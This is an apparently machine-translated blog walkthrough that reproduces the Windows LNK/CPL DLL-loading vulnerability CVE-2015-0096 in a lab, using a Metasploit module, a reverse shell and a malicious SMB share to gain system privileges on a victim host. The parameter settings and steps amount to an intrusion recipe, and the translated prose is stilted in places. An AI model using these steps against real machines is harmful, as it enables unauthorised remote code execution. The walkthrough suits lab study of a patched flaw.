Shulou(Shulou.com)05/31 Report--

This article introduces the Microsoft DLL embedded remote code execution vulnerability CVE-2015-0096 example analysis, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Causes of loopholes

Microsoft Windows does not properly handle the loading of DLL files, and there is a remote code execution vulnerability, which can be exploited by inducing users to open some files on remote WebDAV or SMB shares, which can cause arbitrary libraries to be loaded after successful exploitation. Windows uses .lnk to define shortcuts to files or directories, and you can use .CPL files to customize icons. The problem is that in Windows, icons are loaded from modules (or executables or dynamic link libraries). In fact, .cpl files are actually DLL files. Because attackers can define which executable modules will be loaded, attackers can use .LNK files to execute arbitrary code.

Vulnerability environment

Invade the host linux:192.168.1.125

Shared file host win7:192.168.1.102

Victim host win7:192.168.1.109

Loophole recurrence

Prepare the host environment of two Windows7 and set up one for faster direct copy.

Clone a Windows7:

Create a share folder on disk C on a win7 host and share it.

Check on the second host to see if the share was successful.

After the sharing is successful, the required environmental conditions are achieved, and then the attack machine kali Linux is used to attack. The tool used is msf.

Search for related vulnerabilities: ms15_020

Exploit related vulnerability modules:

Set a bounce shell:

View the parameters that need to be set:

Set the parameters, set the UNCHOST and UNCSHARE of the vulnerability exploitation module list

Set UNCHOST 192.168.1.102

Set to file share host address

Set UNCSHARE share

Set the folder for shared files, where the host 192.168.1.102 enables sharing in the folder in share under disk C, and creates the share in advance

Set LHOST 192.168.1.125

Set the address of the backdoor connection that the vulnerability has been successfully exploited

Exploit

Execution loophole

Several files were generated, and we went to the generated directory to copy the files to the shared folder of the shared host:

You may be prompted as follows:

Use renaming to solve the problem, remember to change it back.

After the victim accessed the share, the vulnerability was successfully triggered.

You can find that the intruder has bounced back a reply session 1.

Successfully obtained system permissions.

This is the end of the example analysis of Microsoft DLL implanted remote code execution vulnerability CVE-2015-0096. I hope the above content can be helpful to everyone and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.